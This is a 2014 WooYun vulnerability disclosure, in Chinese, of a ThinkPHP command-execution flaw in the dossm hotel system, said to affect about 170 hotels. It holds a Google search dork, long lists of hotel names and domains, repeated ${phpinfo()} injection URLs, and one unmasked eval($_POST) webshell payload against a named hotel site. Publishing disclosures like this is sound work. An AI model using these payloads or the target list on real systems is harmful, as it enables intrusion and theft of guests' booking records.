一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

漏洞作者：北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-25：细节已通知厂商并且等待厂商处理中
2014-09-28：厂商已经确认，细节仅向厂商公开
2014-10-01：细节向第三方安全合作伙伴开放
2014-11-22：细节向核心白帽子及相关领域专家公开
2014-12-02：细节向普通白帽子公开
2014-12-12：细节向实习白帽子公开
2014-12-24：细节向公众公开

简要描述：

一个漏洞沦陷至少170家酒店及酒店集团（可查开房信息，国庆你还开房吗）
御庭酒店集团、钓鱼台、BARONY、欧亚酒店集团、彩虹会、REGALIA、悦华国际、通程国际酒店管理有限公司等
当然，不仅仅这几家，数量至少90家酒店及酒店集团，包含全国各地酒店。

详细说明：

全都是使用dossm系统该系统基于thinkphp开发存在命令执行漏洞
案例：http://www.wintour.cn/case.html
广州问途信息技术有限公司
谷歌的一个关键字

6到30个字符,不可含 inurl:register.html

这并不是全部
影响酒店列表（包括但不限于）：

涉及的酒店名单：
UC Berkeley - Graduate School of Education
University at Buffalo Department of Physics
三亚iHome海景度假公馆
中信·博鳌千舟湾度假公寓
文轩苑
三亚牧海
东海大厦
帝豪酒店
旅行在线
神州会通
英德仙湖
西苑饭店
远洋宾馆
阳光酒店
阳朔酒店
阳光酒店- 深圳  
东莞迎宾馆
天福源酒店
广东迎宾馆
三亚天域酒店
东莞帝豪酒店
天域度假酒店
帝豪酒店集团
广州建国酒店
广州建国饭店
广州远洋宾馆
广州阳光酒店
广晟旅业集团
御庭酒店集团
成都阳光酒店
桂山华星酒店
深圳阳光酒店
远洋集团酒店
鲜花满屋客栈
深圳阳光酒店  
三亚宝宏大酒店
三亚石溪墅酒店
三亚祈年高尔夫
华雅国际大酒店
南通市文峰饭店
天域长白山酒店
广东裕通大酒店
广州地中海国际
广州木莲庄酒店
庐山北斗星酒店
张家界阳光酒店
深圳求水山酒店
珠海德翰大酒店
珠海海湾大酒店
苏州冠云大酒店
远广州远洋宾馆
长沙金源大酒店
阳朔懒人堂客栈
龙源温泉大酒店
三亚丽景海湾酒店
三亚海韵度假酒店
三亚牧海主题酒店
三亚珠江花园酒店
东莞帝豪花园酒店
东莞欧亚国际酒店
乐清市金鼎大酒店
云浮凯旋国际酒店
亚龙湾高尔夫球会
北京昆泰嘉华酒店
厦门建发旅游集团
四会岭南东方酒店
广东华师粤海酒店
广州华金盾大酒店
广州科尔海悦酒店
广州逸林假日酒店
广州香雪国际酒店
成都天府阳光酒店
桂林鲜花满屋酒店
欧亚国际酒店集团
武汉中南花园饭店
河南天地粤海酒店
海南亚泰温泉酒店
美丽之冠管理集团
首旅建国酒店管理
上海久阳滨江酒店  
东莞帝豪花园酒店  
广东华师粤海酒店  
广州花样年华酒店  
成都天府阳光酒店  
玉海国际度假酒店  
美丽之冠管理集团  
北京应物会议中心(花园路店)
万年县红万年大酒店
三亚中亚国际大酒店
三亚天福源度假酒店
三亚金棕榈度假酒店
常州九洲环宇大酒店
广东亚洲国际大酒店
广州地中海国际酒店
海口黄金海景大酒店
深圳宝利来国际大酒
重庆仙女山华邦酒店
阳朔小清迈精品酒店
三亚金棕榈度假酒店 
重庆仙女山华邦酒店 
三亚亚龙湾高尔夫球会
三亚柏瑞精品海景酒店
三亚湘投银泰度假酒店
君廷酒店及度假村集团
四川成都天府阳光酒店
张家界禾田居度假酒店
深圳宝利来国际大酒店
琼海天福源温泉大酒店
蓝色海湾海景度假公寓
三亚柏瑞精品海景酒店  
三亚湘投银泰度假酒店  
三亚半山半岛帆船港酒店
三亚海蓝蓝海景度假公寓
五指山亚泰雨林度假酒店
广州嘉鸿华美达广场酒店
琼海天福源温泉度假酒店
三亚凤凰水城凯莱度假酒店
东莞市常平逸豪国际大酒店
惠州德泽园（粤海）假日大酒店

mask 区域

1.://**.**.**//www.aihotel.com/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
2.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
3.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
4.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
5.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
6.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
7.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
8.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
9.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
10.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
11.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
12.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
13.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
14.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
15.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
16.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
17.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
18.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
19.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
20.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
21.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
22.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
23.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
24.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
25.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
26.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
27.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
28.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
29.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
30.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
31.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
32.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
33.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
34.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
35.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
36.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
37.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
38.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
39.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
40.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
41.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
42.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
43.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
44.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
45.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
46.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
47.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
48.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
49.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
50.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
51.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
52.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
53.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
54.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
55.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
56.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
57.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
58.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
59.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
60.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
*****0 处^*****
61.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
62.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
63.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
64.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
65.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
66.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
67.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
68.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
69.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
70.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
71.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
72.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
73.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
74.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
75.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
76.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
77.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
78.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
79.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
80.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
81.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
82.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
83.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
84.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
85.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
86.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
87.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
88.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
89.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
90.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
91.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
92.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
93.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
94.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
95.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
96.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
97.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
98.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D_
99.http://**.**.**/saas/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D</code>

aihotel.com
baohonghotel.com
baolilai-hotel.com
bmgcn.com
chinameetings.cn
cnicc.com
dehan.test.dossm.com
devpaytmpl3v15.test.dossm.com
dgdh.test.dossm.com
dggarden.royalhotels.cn
dgrhm.group.dossm.com
dzhgz.com
easelandhotel.com
electron.physics.buffalo.edu
fhschotel.com
guangzhougdhhotel.com
gzdhhotel.test.dossm.com
horizon.com.cn
horizonsanya.com
hotelsjianguo.com
hotelxianjianguo.com
huangdao.lanhai.cn
huangshan.baronyhotels.com
huaponthotel.com
hy.yingwu.com.cn
hzdzyhotel.test.dossm.com
jianguohotelgz.com
laoshan.lanhai.cn
licheng.lanhai.cn
lxol.com.cn
m.xiyuanhotel.com.cn
m.yfkxhotel.com
mail.resortintime.com
oceanhotel.coscohotels.com
osresort.cn
ouyahotels.com
prgardenhotel.com.cn
qh.tianfuyuan.com
qh.wap.tianfuyuan.com
qianmenhotel.com
resortgp.com
resortintime.com
rmhgz.cn
royalgardenhotel.com.cn
royalmarinaplaza.com
sanya31.com
sanyaliking.com
sci-apartment.com
shizhong.lanhai.cn
sunshinehotel.com
sunshinehotelzjj.com
sxs.resortgp.com
sy.tianfuyuan.com
sy.wap.tianfuyuan.com
szjingdu.com
test.cndhotels.com
test.yeohwahotels.com
tfsunshinehotel.com
tfyg.test.dossm.com
tokaihotel.coscohotels.com
vaya-hotel.cn
wakingtown-hotel.com
wap.skyland-hotel.com
wap.soluxehotel.com
whoyhz.test.dossm.com
wintour.cn
www-gse.berkeley.edu
www.3496666.com
www.aihotel.com
www.baohonghotel.com
www.baolilai-hotel.com
www.baronyhotels.com
www.bllhotel.com
www.bmgcn.com
www.chinameetings.cn
www.cnicc.com
www.colorfuldays-hotel.com
www.coscohotels.cn
www.coscohotels.com
www.coscohotels.com.cn
www.dgeahotel.com
www.dgybhotel.com
www.dzhgz.com
www.dzyhotel.com
www.easelandhotel.com
www.ebdh-hotel.com
www.eco-hotel.com.cn
www.eversunshinehotel.com
www.fcghotel.com
www.fhschotel.com
www.gbvh.com
www.gdhhotels.com
www.gdyutonghotel.com
www.glamorhotel.com
www.goldenhotel.com.cn
www.goldsourcehotel.com
www.guangzhougdhhotel.com
www.guishanhotel.com
www.hainanyataihotel.com
www.harmonahotel.com
www.hebs.asia
www.horizon.com.cn
www.horizoncbs.com
www.horizonsanya.com
www.hotelsjianguo.com
www.huaponthotel.com
www.hwndjd.com
www.jadesea.cn
www.jbstel.com
www.jianguohotelgz.com
www.jianliharmonyhotel.com
www.jindinghotel.cn
www.joyahotel.cn
www.joyahotel.com
www.kuntairoyalhotel.com
www.lndfhotel-sh.com
www.lphotel.cn
www.lyhotspring.com
www.muhaihotel.com
www.oceanhotel.com.cn
www.osresort.cn
www.ouyahotels.com
www.physics.buffalo.edu
www.pinweijiudian.com
www.prgardenhotel.com.cn
www.qianzhouwan.com
www.qsshotel.com
www.ramadaplazagz.com
www.regalia.com.cn
www.resortgp.com
www.resortintime.com
www.rhgresorts.com
www.risinghotel.com
www.royalgardenhotel.com.cn
www.royalhotels.cn
www.royalmarinaplaza.com
www.sanya31.com
www.sanyabarry.com
www.sanyaliking.com
www.sevenraygolf.com
www.shangrilaassociation.org
www.singwood.com.cn
www.soluxehotel.com
www.soluxehotelgz.com
www.sunshinehotel.com
www.sunshinehotels.cn
www.sunshinehotelzjj.com
www.szjingdu.com
www.tfsunshinehotel.com
www.themulian.com
www.tianfuyuan.com
www.vaya-hotel.cn
www.wakingtown-hotel.com
www.wenfenghotel.com
www.wintour.cn
www.wmjh.cn
www.wuzhishanyatai.com
www.wx-hotel.com
www.xianhuamanwu.com
www.xiaoqingmai.com
www.xn--sjqu43axxn38f.com
www.xsfd.com
www.yalongbaygolfclub.com
www.yangshuoholiday.com
www.yfkxhotel.com
www.yhihotel.com
www.yingbinhotel.cn
www.ysdidu.com
www.znhyfd.cn
www.zzghhotel.com
xitangjiudian.com
xiushan.baronyhotels.com
yalongbaygolfclub.com
ysdidu.com
zhaolonghotel.com.cn

http://be.btghotels.com/

mask 区域

*****/param1/$%7B*****

http://be.btghotels.com/

mask 区域

*****1/$%7B@print(ev*****

漏洞证明：

涉及的酒店太多了数据库如下：

通用
http://www.sanya31.com/saas/index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2014-09-28 11:40

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

相关厂商：cncert

漏洞作者：北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077249

漏洞标题：一个漏洞沦陷至少全国各地170家酒店及酒店集团（可查开房信息，国庆你还开房吗）

相关厂商：cncert

漏洞作者： 北京方便面

提交时间：2014-09-25 10:03

修复时间：2014-12-24 10:04

公开时间：2014-12-24 10:04

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-077249"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：北京方便面

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源北京方便面@乌云